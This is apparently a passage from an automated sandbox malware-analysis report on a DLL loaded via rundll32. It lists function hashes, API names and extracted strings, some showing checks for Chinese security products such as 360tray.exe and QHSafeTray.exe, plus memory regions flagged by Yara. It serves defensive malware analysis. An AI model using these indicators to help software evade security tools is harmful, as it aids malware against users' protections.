                                                                                    • Instruction ID: bbf3e12eda5f2f818c86a6d8723dcf8fbef42ab492d342ab48d7d832c77590ad
                                                                                    • Opcode Fuzzy Hash: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
                                                                                    • Instruction Fuzzy Hash: 7751E53231164885FEA6CF51E4103E962A0FB5DBE4F48C621EA6A4B7D4DF3DC649C705
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterErrorLastLeavememsetstd::_std::exception_ptr::exception_ptr
                                                                                    • String ID: arm64$x64$x86
                                                                                    • API String ID: 4069188616-280937049
                                                                                    • Opcode ID: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
                                                                                    • Instruction ID: 117583cd4254ef97ff9b72dc100ece26d9127ce95370434fd6434e2e215e4972
                                                                                    • Opcode Fuzzy Hash: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
                                                                                    • Instruction Fuzzy Hash: 78415B71B00A1C95FA92DB20EC843D937A4F70C7E8FA58611F96A536E6DF34C68AC740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressCurrentErrorHandleLastModuleProcProcessstd::_std::exception_ptr::exception_ptr
                                                                                    • String ID: IsWow64Process2$Kernel32.dll
                                                                                    • API String ID: 1364622999-2175735969
                                                                                    • Opcode ID: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
                                                                                    • Instruction ID: 5a1c62e2a9ead4f3428123871bab1930646db393e55966b9c052552951b7636c
                                                                                    • Opcode Fuzzy Hash: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
                                                                                    • Instruction Fuzzy Hash: DD416531204B4991EAA2CF14EC843DA73A4FB8D794FA18226F659437A5DF38CB4DCB44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$AddressEnterFreeInitializeLibraryProc
                                                                                    • String ID: InitLibs
                                                                                    • API String ID: 388043826-2748520195
                                                                                    • Opcode ID: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
                                                                                    • Instruction ID: 14a8bfa7cef1bdae3a626f07b321ff872beb2833b4a3adf2d3b4914cd80619d3
                                                                                    • Opcode Fuzzy Hash: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
                                                                                    • Instruction Fuzzy Hash: 5631953661874882EBA78F25A4547AE23B0F78DFD4F1A9125ED5A473A4DF38C649CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileName_wcsicmp$FindModulePathmemset
                                                                                    • String ID: 360tray.exe$QHSafeTray.exe
                                                                                    • API String ID: 2436975468-72543816
                                                                                    • Opcode ID: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
                                                                                    • Instruction ID: f13d88eabac643da90db78e2c45270d8f51b6174de2d3bfd56aa28c15744bb18
                                                                                    • Opcode Fuzzy Hash: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
                                                                                    • Instruction Fuzzy Hash: 86114230615B4882FBA6CB21EC593D62364FB8C7A5F408225E56A867E5EF3DC74DCB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf$AllocateFolderMemoryPathVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 206084008-0
                                                                                    • Opcode ID: 3f0a1096dd83600a13c208f95dfa09032702bdcf8618f0e5637695aff639911f
                                                                                    • Instruction ID: ae88e02c693446d7e35fd2a8ac2908912c689bd6bcc82c48e912ddb3e7313a3b
                                                                                    • Opcode Fuzzy Hash: 3f0a1096dd83600a13c208f95dfa09032702bdcf8618f0e5637695aff639911f
                                                                                    • Instruction Fuzzy Hash: 76D1FC32619BC192EA60DB10E4543DFB7B2F7C5344F901026B68D93A9EDFB9C65ACB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection_time64$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3499907473-0
                                                                                    • Opcode ID: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
                                                                                    • Instruction ID: 2d3d355faa5a201e66dfe59503a55f94d93e9d2144db4385c4ebef4b0973e561
                                                                                    • Opcode Fuzzy Hash: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
                                                                                    • Instruction Fuzzy Hash: B9517B31605B4889FB968F25E9543D933A5FB0EBE8F548115FD5A27764CF39C689C300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errno
                                                                                    • String ID:
                                                                                    • API String ID: 2918714741-0
                                                                                    • Opcode ID: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
                                                                                    • Instruction ID: 8158435372b26aa4a6dd2edb7174a458af360551698bfd787e5366ef90707461
                                                                                    • Opcode Fuzzy Hash: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
                                                                                    • Instruction Fuzzy Hash: 0441A733604A4886EAA36FA9A4003DD7290BB8C7F4F55C310FA684B7D6CF3DC6598711
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf$CloseCodeExitHandleInternetThreadnew[]$AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 511820185-0
                                                                                    • Opcode ID: 3fe910b28b83b94efe5e873a318251407e96b92a7ff7815bdbceea1527c33b44
                                                                                    • Instruction ID: 6bcb1a04a514067091ab586a3c3ad21fb043f8e5339ad42e31bd593604f3ae2d
                                                                                    • Opcode Fuzzy Hash: 3fe910b28b83b94efe5e873a318251407e96b92a7ff7815bdbceea1527c33b44
                                                                                    • Instruction Fuzzy Hash: 4F52CA31509BC09AE770CB15F4483DEB7B2F785344F105116E68987AAADFBEC689CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                                      • Part of subcall function 00000001800562D0: memset.MSVCRT ref: 000000018005630E
                                                                                      • Part of subcall function 00000001800562D0: GetModuleFileNameW.KERNEL32 ref: 0000000180056325
                                                                                      • Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 0000000180056349
                                                                                      • Part of subcall function 00000001800562D0: _wcsicmp.MSVCRT ref: 0000000180056364
                                                                                      • Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 000000018005637A
                                                                                    • RegCloseKey.ADVAPI32 ref: 0000000180056B49
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AppendPath$CloseFileHeapModuleNameProcess_wcsicmpmemset
                                                                                    • String ID: 360EntSecurity$360Safe$?$SOFTWARE\$SOFTWARE\Wow6432Node\
                                                                                    • API String ID: 2226481571-3054377637
                                                                                    • Opcode ID: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
                                                                                    • Instruction ID: 5d79a3dbe08d97a28ec647ffc4188a53122dfd3fad7d09cd3595c12d58dad182
                                                                                    • Opcode Fuzzy Hash: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
                                                                                    • Instruction Fuzzy Hash: 211261B2701A4886EB419B69C8413DD73A1FB85BF4F448711AA3D977E5DF78CA89C340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeString$??2@??3@_wtoi
                                                                                    • String ID: //reccfg/wndclass
                                                                                    • API String ID: 1119205991-3779619899
                                                                                    • Opcode ID: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
                                                                                    • Instruction ID: aac1c87dd54dd223690f6a51cef8bcee3ce48f855a47f00273c96f55abf577db
                                                                                    • Opcode Fuzzy Hash: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
                                                                                    • Instruction Fuzzy Hash: D5B17A32701E489AEB81CF79C4803DC33A0F749B98F058626EA1E57B98DF38CA59C345
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$htonl$htonsmemmove
                                                                                    • String ID:
                                                                                    • API String ID: 2604728826-0
                                                                                    • Opcode ID: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
                                                                                    • Instruction ID: c6a7ef21b5906d6b557d77442a06c91d81bd98b5ee7ca8850e16d0b233cac89c
                                                                                    • Opcode Fuzzy Hash: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
                                                                                    • Instruction Fuzzy Hash: 21B15B36704B848AE792CF61F48039EB7B5F748788F518015EE8917A98CF38D65DDB48
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??3@?terminate@@$ErrorExceptionLastThrowmemmove
                                                                                    • String ID:
                                                                                    • API String ID: 223594506-0
                                                                                    • Opcode ID: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
                                                                                    • Instruction ID: fcc32ee8dbcfcc96106fa9aa2d9edb036d58ed735eb2ced8cd8263455d285739
                                                                                    • Opcode Fuzzy Hash: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
                                                                                    • Instruction Fuzzy Hash: 0971E472210B8882EB559F19E8403DE6321FB8DBD4F608611FBAD47B96DF38C699C300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value_errno$HeapProcess_time64
                                                                                    • String ID: %s_count$%s_lasttime$CloudCfg
                                                                                    • API String ID: 2146318826-610660357
                                                                                    • Opcode ID: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
                                                                                    • Instruction ID: 0a7454a278269eadbb0ffce7cefadb2dc21e45630bc3a54506c3f9663c92b6cc
                                                                                    • Opcode Fuzzy Hash: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
                                                                                    • Instruction Fuzzy Hash: DC819572215B4986EB91DB64D4807DE77A0F7887E4F508226FA5E437E9DF38CA48CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Stream$??3@CreateFromLockSizeUnlock
                                                                                    • String ID: __Location__
                                                                                    • API String ID: 3539542440-1240413640
                                                                                    • Opcode ID: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
                                                                                    • Instruction ID: 0f7485e4f93bbca4fed8cf01455b67f1128db3508264a427a58b068d72c2ae23
                                                                                    • Opcode Fuzzy Hash: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
                                                                                    • Instruction Fuzzy Hash: A6818072700A4885EB46DB75D8403DC3761F749BE8F548216EA2E577E5DF34CA89C300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext
                                                                                    • String ID:
                                                                                    • API String ID: 3213498283-0
                                                                                    • Opcode ID: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
                                                                                    • Instruction ID: 1492bbbb0fb01b81f8d7bc8417cc5d1fdb32638e21ab672acd404a2c35c9a6c4
                                                                                    • Opcode Fuzzy Hash: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
                                                                                    • Instruction Fuzzy Hash: 5B417236615A9881FBA2CF11D4143A833E0FB5CBD4F44C412EB8A47795EF78C7AA9305
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value$_time64$HeapProcess
                                                                                    • String ID: %s_count$%s_lasttime$CloudCfg
                                                                                    • API String ID: 1319719158-610660357
                                                                                    • Opcode ID: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
                                                                                    • Instruction ID: 831a43b99bf02356c207f364941f14581f3732c075b2ce428cfbfee20bf611f1
                                                                                    • Opcode Fuzzy Hash: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
                                                                                    • Instruction Fuzzy Hash: 6D416CB2701B4486EB51DB29D84079D37A1FB89BF8F048325AA2E577E5DF38C688C341
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                    • String ID: @
                                                                                    • API String ID: 1610889594-2766056989
                                                                                    • Opcode ID: a436dfbeec11fa72cacc95f9423c30dfac001b64611d56dab0d816701a932b9f
                                                                                    • Instruction ID: b1f6375e0bdf7884274bbcdc4671add014ceefcb1e24689ae3ddc24420ae9588
                                                                                    • Opcode Fuzzy Hash: a436dfbeec11fa72cacc95f9423c30dfac001b64611d56dab0d816701a932b9f
                                                                                    • Instruction Fuzzy Hash: 3C512A36614B8582EBA0DF25E44439EA7B2F7C4794F505021FA9E43BAADF7EC645CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AppendCloseCreateHandleModuleNamePathReadSizememmove
                                                                                    • String ID: ..\config\msgcenter64.dat
                                                                                    • API String ID: 1552649294-925171115
                                                                                    • Opcode ID: 2b6bc0a9826245997d2484599f869692e6608d281a15ca6de91b59abf58e858d
                                                                                    • Instruction ID: 6037bf8a0cbc718679defd9cfc68d096276397db31603676c3dd85afabd3a34b
                                                                                    • Opcode Fuzzy Hash: 2b6bc0a9826245997d2484599f869692e6608d281a15ca6de91b59abf58e858d
                                                                                    • Instruction Fuzzy Hash: A1316032604B8886E751CF61E8447CDBBA4F389BD4F508115FEA917BA8CF38C64ACB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
